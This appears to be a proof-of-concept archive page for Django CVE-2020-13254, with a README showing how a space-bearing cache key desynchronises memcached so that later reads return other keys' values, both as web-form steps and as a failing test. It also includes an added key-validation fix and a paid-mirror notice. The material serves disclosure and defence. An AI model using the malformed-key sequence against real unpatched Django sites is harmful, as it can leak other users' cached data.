Associated Vulnerability
Title: Django trust management issue vulnerability (CVE-2020-13254)
Description: An issue was discovered in Django 2.2 before 2.2.13 and 3.0 before 3.0.7. In cases where a memcached backend does not perform key validation, passing malformed cache keys could result in a key collision, and potential data leakage.
Description
Vulnerability demonstration for Django CVE-2020-13254
Readme
# Django CVE-2020-13254
This repository demonstrates exploitation of CVE-2020-13254 in two ways – via a
web interface and via a failing test case.
For more details visit:
<https://danpalmer.me/2020-06-07-django-memcache-vulnerability/>
### Exploiting via the web
The example provides a web interface with two forms, one that sets values in the
cache and the other that gets them. These are translated directly into calls to
the Django cache backend. Because the codebase does not implement any session or
authentication system, multiple requests from the same browser tab are
indistinguishable from multiple users on different machines.
To exploit:
1. Set keys of **A** and **B** to values **a** and **b**.
2. Attempt to set **C D** to value **c d**. This will error.
3. Attempt to retrieve key **A**; there will incorrectly be no result.
4. Attempt to retrieve key **B**; the result will incorrectly be **a**.
### Demo via tests
This process can be expressed as a test case as such:
```python
from django.core.cache import cache
from django.test import TestCase


class CacheTests(TestCase):
    def test_cache(self):
        cache.set('k1', 'v1')
        cache.set('k2', 'v2')
        try:
            # Malformed key: the space is a field separator in the memcached
            # text protocol, so the command is rejected by the server.
            cache.set('a b', 'v3')
        except Exception:
            pass
        # Subsequent reads should still map each key to its own value.
        self.assertEqual(
            [
                cache.get(x) for x in
                ['k2', 'k1', 'k2', 'k1', 'k2', 'k1']
            ],
            ['v2', 'v1', 'v2', 'v1', 'v2', 'v1'],
        )
```
This fails with the following error:
```
=============================================================
FAIL: test_cache (demo.tests.CacheTests)
-------------------------------------------------------------
Traceback (most recent call last):
  File "tests.py", line 30, in test_cache
    'v1',
AssertionError: Lists differ

First differing element 0:
None
'v2'

- [None, 'v2', 'v1', 'v2', 'v1', 'v2']
?  ------
+ ['v2', 'v1', 'v2', 'v1', 'v2', 'v1']
?                                ++++++
-------------------------------------------------------------
```
After the failed `set` of the malformed key, the values the cache returns are
out of step with the queries being made: each read gets the answer that belonged
to the previous query.
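The fix Django shipped for this issue is to validate keys before they reach the memcached client, so that a key containing a space (the **C D** key in the web steps, or `'a b'` in the test above) is rejected instead of desynchronising the connection. The following is an added example, not code from the demo repository or from Django itself: a small validator whose checks follow the intent of Django's `memcache_key_warnings` helper (a 250-byte length limit and no whitespace or control characters; Django measures characters rather than bytes), plus a `ValidatingCache` front-end that replays the README's sequence. The class, function names and the dict used as a stand-in backend are this example's own, so it shows the malformed key being refused and the later reads staying in step, not the collision itself.

```python
"""Key validation in front of a memcached-style cache (added example).

The checks follow the shape of Django's post-fix validation for
CVE-2020-13254: a key must fit in 250 bytes and must not contain whitespace
or control characters, because the memcached text protocol uses spaces and
newlines as field and command delimiters. ValidatingCache and its dict
backend are constructed for this offline demo, not taken from Django.
"""

MEMCACHE_MAX_KEY_LENGTH = 250  # memcached's protocol limit on key length


class InvalidCacheKey(ValueError):
    """Raised for keys the memcached text protocol cannot carry safely."""


def key_problems(key):
    """Return the reasons a key is unsafe for memcached; an empty list means OK."""
    if not isinstance(key, str):
        return ["key must be a str, got %s" % type(key).__name__]
    problems = []
    if len(key.encode("utf-8")) > MEMCACHE_MAX_KEY_LENGTH:
        problems.append("key is longer than %d bytes" % MEMCACHE_MAX_KEY_LENGTH)
    # ord(ch) < 33 covers space, tab, CR and LF (the protocol delimiters)
    # and the other C0 control characters; 127 is DEL.
    if any(ord(ch) < 33 or ord(ch) == 127 for ch in key):
        problems.append("key contains whitespace or control characters")
    return problems


def validate_key(key):
    """Raise InvalidCacheKey rather than letting a malformed key reach the socket."""
    problems = key_problems(key)
    if problems:
        raise InvalidCacheKey("; ".join(problems))
    return key


class ValidatingCache:
    """Minimal cache front-end that validates every key before use.

    The backend is a plain dict here (constructed for the demo); in a real
    deployment it would be the memcached client object.
    """

    def __init__(self, backend=None):
        self._backend = {} if backend is None else backend

    def set(self, key, value):
        self._backend[validate_key(key)] = value

    def get(self, key, default=None):
        return self._backend.get(validate_key(key), default)


def replay_readme_sequence():
    """Replay the README's test: two good sets, one malformed set, six reads.

    Returns (whether the malformed key was rejected, the six values read back).
    With validation in front of the backend the bad key never reaches it, so
    the reads stay in step with the queries.
    """
    cache = ValidatingCache()
    cache.set("k1", "v1")
    cache.set("k2", "v2")
    rejected = False
    try:
        cache.set("a b", "v3")  # the space-bearing key from the README
    except InvalidCacheKey:
        rejected = True
    reads = [cache.get(x) for x in ["k2", "k1", "k2", "k1", "k2", "k1"]]
    return rejected, reads


if __name__ == "__main__":
    print(key_problems("C D"))
    print(replay_readme_sequence())
```

Running the module prints the reason `C D` is refused and then `(True, ['v2', 'v1', 'v2', 'v1', 'v2', 'v1'])`, the in-step result the README's test expects. The useful property for a defender is that the check happens before any bytes are written to the connection, so a single bad key cannot shift the responses seen by every later request on that connection.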
File Snapshot
[4.0K] /data/pocs/b23ac93b862959c9e56a658bcd2e075f5e2c0e92
├── [4.0K] demo
│ ├── [4.0K] demo
│ │ ├── [ 385] asgi.py
│ │ ├── [ 0] __init__.py
│ │ ├── [1.3K] settings.py
│ │ ├── [4.0K] templates
│ │ │ └── [ 493] index.html
│ │ ├── [ 702] tests.py
│ │ ├── [ 132] urls.py
│ │ ├── [ 393] views.py
│ │ └── [ 385] wsgi.py
│ └── [ 624] manage.py
├── [2.1K] README.md
└── [ 73] requirements.txt
3 directories, 11 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support.